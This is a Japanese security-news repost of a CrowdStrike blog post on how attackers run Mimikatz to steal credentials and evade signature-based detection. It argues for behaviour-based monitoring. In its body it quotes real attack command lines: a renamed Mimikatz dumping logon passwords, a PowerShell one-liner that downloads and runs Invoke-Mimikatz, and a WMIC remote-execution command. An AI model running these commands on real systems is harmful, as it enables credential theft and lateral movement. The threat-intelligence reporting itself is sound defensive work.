CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避 | ScanNetSecurity
2022.12.04(日)
コンテンツ
注目検索ワード
ホーム 国際 海外情報 記事

CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避

今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。

国際 海外情報
 今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。中にはシグネチャベースの検知を回避するためにMimikatzが使われた珍しいケースもあります。

 OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。

権限昇格に使用する認証情報へのアクセス

 悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています(認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています)。

Mimikatzの手法

 認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者(CTO)のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト(侵入テスト)のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。

実行ファイル名の変更

 Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。

c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""

 これにより攻撃者は、システム上の認証情報にアクセスできるようになります。

バッチファイルの使用

 Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。

PowerShellの亜種を使用

 OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'

コマンドラインオプションの変更

 2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。

mnl.exe pr::dg sl::lp et -p

 このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。

Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"

IOAの監視が必須

 これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。

 ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡(IOC)に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡(IOA)を監視することの重要性が、さらに明らかになっています。

その他のリソース

「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください

「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください

・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください

*原文はCrowdStrike Blog サイト掲載 :https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/
《Harlan Carvey (CrowdStrike)》

ソース・関連リンク

関連記事

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

脆弱性と脅威 記事一覧へ

警察庁が注意喚起、学術関係者を標的とした講演や取材依頼を偽装したサイバー攻撃 画像

警察庁が注意喚起、学術関係者を標的とした講演や取材依頼を偽装したサイバー攻撃
WordPressプラグインAdvanced Custom Fieldsの脆弱性 発見者 イエラエ山崎氏解説 画像

WordPressプラグインAdvanced Custom Fieldsの脆弱性 発見者 イエラエ山崎氏解説
アプリゲーム「BLUE REFLECTION SUN/燦」のなりすましアカウントを確認、注意を呼びかけ 画像

アプリゲーム「BLUE REFLECTION SUN/燦」のなりすましアカウントを確認、注意を呼びかけ
「baserCMS」に複数のクロスサイトスクリプティングの脆弱性 画像

「baserCMS」に複数のクロスサイトスクリプティングの脆弱性
Proofpoint Blog 第19回「2022年秋のEmotetの復活を総合的に考える」 画像

Proofpoint Blog 第19回「2022年秋のEmotetの復活を総合的に考える」
TP-Link RE300 V1 の tdpServer に入力データの不適切な処理に関する脆弱性 画像

TP-Link RE300 V1 の tdpServer に入力データの不適切な処理に関する脆弱性

インシデント・事故 記事一覧へ

メタップスペイメント 行政処分後のセキュリティ対応状況進捗 画像

メタップスペイメント 行政処分後のセキュリティ対応状況進捗
川崎市で誤廃棄を虚偽報告「全体の奉仕者としてふさわしくない非行」懲戒処分 画像

川崎市で誤廃棄を虚偽報告「全体の奉仕者としてふさわしくない非行」懲戒処分
JFRグループで共同利用の個人情報、対象外の項目を誤ってデータ送信 画像

JFRグループで共同利用の個人情報、対象外の項目を誤ってデータ送信
ライティング製品取り扱い「GENTOS公式ストア」に不正アクセス、5,471件のカード情報が漏えい 画像

ライティング製品取り扱い「GENTOS公式ストア」に不正アクセス、5,471件のカード情報が漏えい
主治医による事情説明と謝罪を実施、東海大学医学部付属病院でSDカード紛失 画像

主治医による事情説明と謝罪を実施、東海大学医学部付属病院でSDカード紛失
Twitterの脆弱性で漏えいした540万人分の個人情報、ハッカーが一般公開 画像

Twitterの脆弱性で漏えいした540万人分の個人情報、ハッカーが一般公開

調査・レポート・白書・ガイドライン 記事一覧へ

マネロン アズ ア サービス、仮想都市が攻撃対象に、ワイパーのコモディティ化 ほか ~ 2023年フォーティネット予測 画像

マネロン アズ ア サービス、仮想都市が攻撃対象に、ワイパーのコモディティ化 ほか ~ 2023年フォーティネット予測
CrowdStrike Adversary Calender 2022 年 12 月 画像

CrowdStrike Adversary Calender 2022 年 12 月
平均3分46秒 パスワード再設定に「浪費」する所要時間 画像

平均3分46秒 パスワード再設定に「浪費」する所要時間
日本の大学を詐称する日本語ばらまき型メールの解析結果 画像

日本の大学を詐称する日本語ばらまき型メールの解析結果
CSSC、ビルシステム向けセキュリティ対策カタログ公開 配布は申請認可式 画像

CSSC、ビルシステム向けセキュリティ対策カタログ公開 配布は申請認可式
21.7%の法人が外部メディアの紛失や盗難によるインシデントを経験 画像

21.7%の法人が外部メディアの紛失や盗難によるインシデントを経験

研修・セミナー・カンファレンス 記事一覧へ

4匹のサイバーセキュリティコンサルタント 最前線の知見を共有「Cyber Summit 2022」12/7-8 開催 画像

4匹のサイバーセキュリティコンサルタント 最前線の知見を共有「Cyber Summit 2022」12/7-8 開催
2021年SFプロトタイピングの旅 第10回「大成功した西側の概念兵器『民主主義』」 画像

2021年SFプロトタイピングの旅 第10回「大成功した西側の概念兵器『民主主義』」
サイバー犯罪インテリジェンス企業 KELA社が日本で初めてワークショップ開催、アナリスト池上遥氏 登壇(CPEクレジット付与) 画像

サイバー犯罪インテリジェンス企業 KELA社が日本で初めてワークショップ開催、アナリスト池上遥氏 登壇(CPEクレジット付与)
2021年SFプロトタイピングの旅 第9回「サイバーセキュリティの課題『新しい物語の提供』」 画像

2021年SFプロトタイピングの旅 第9回「サイバーセキュリティの課題『新しい物語の提供』」
JP-RISSA 小松 誠が語る、サプライチェーンリスクでさらに広がる情報処理安全確保支援士の役割 画像

JP-RISSA 小松 誠が語る、サプライチェーンリスクでさらに広がる情報処理安全確保支援士の役割
Emotet、MoqHao、Pegasus… 星の数ほどあるマルウェア 感染拡大するのは 画像

Emotet、MoqHao、Pegasus… 星の数ほどあるマルウェア 感染拡大するのは

製品・サービス・業界動向 記事一覧へ

MSYS、自己回復型セキュリティソリューションAbsoluteシリーズ販売 画像

MSYS、自己回復型セキュリティソリューションAbsoluteシリーズ販売
「iTrust 電子署名用証明書 USB トークンタイプ」ユーザーに認定タイムスタンプを無償付与 画像

「iTrust 電子署名用証明書 USB トークンタイプ」ユーザーに認定タイムスタンプを無償付与
2022年の日本人の優しさを調査した社会実験、セキュリティ管理プラットフォーム S4 プロジェクト中間報告 画像

2022年の日本人の優しさを調査した社会実験、セキュリティ管理プラットフォーム S4 プロジェクト中間報告
文科省「デジタル人材育成推進協議会」初回議事録公開 画像

文科省「デジタル人材育成推進協議会」初回議事録公開
サプライチェーンのセキュリティマネジメントの現状 画像

サプライチェーンのセキュリティマネジメントの現状
NTTデータ先端技術と月島警察署が連携、スマートフォン詐欺への危険性を訴え 画像

NTTデータ先端技術と月島警察署が連携、スマートフォン詐欺への危険性を訴え

おしらせ 記事一覧へ

小説内に登場するバーで直筆サインをいただきました ~ 創刊24周年キャンペーン 11/30 迄 画像

小説内に登場するバーで直筆サインをいただきました ~ 創刊24周年キャンペーン 11/30 迄
「果たされた約束」アフタヌーンティー開催レポート ~ 創刊24周年キャンペーン実施のおしらせ 画像

「果たされた約束」アフタヌーンティー開催レポート ~ 創刊24周年キャンペーン実施のおしらせ
Scan PREMIUM 創刊24周年記念キャンペーン実施中 画像

Scan PREMIUM 創刊24周年記念キャンペーン実施中
ScanNetSecurity 創刊24周年御礼の辞(上野宣) 画像

ScanNetSecurity 創刊24周年御礼の辞(上野宣)
【当選確率3倍】2022年 CrowdStrike カレンダープレゼント 画像

【当選確率3倍】2022年 CrowdStrike カレンダープレゼント
創刊23周年記念イベント「ハッカージャーナリスト誕生譚」オンライン公開インタビュー 11/18 開催 画像

創刊23周年記念イベント「ハッカージャーナリスト誕生譚」オンライン公開インタビュー 11/18 開催
Page Top
「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」
「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」

ページ右上「ユーザー登録」から会員登録すれば会員限定記事を閲覧できます。毎週月曜の朝、先週一週間のセキュリティ動向を総括しふりかえるメルマガをお届け。(写真:ScanNetSecurity 名誉編集長 りく)
×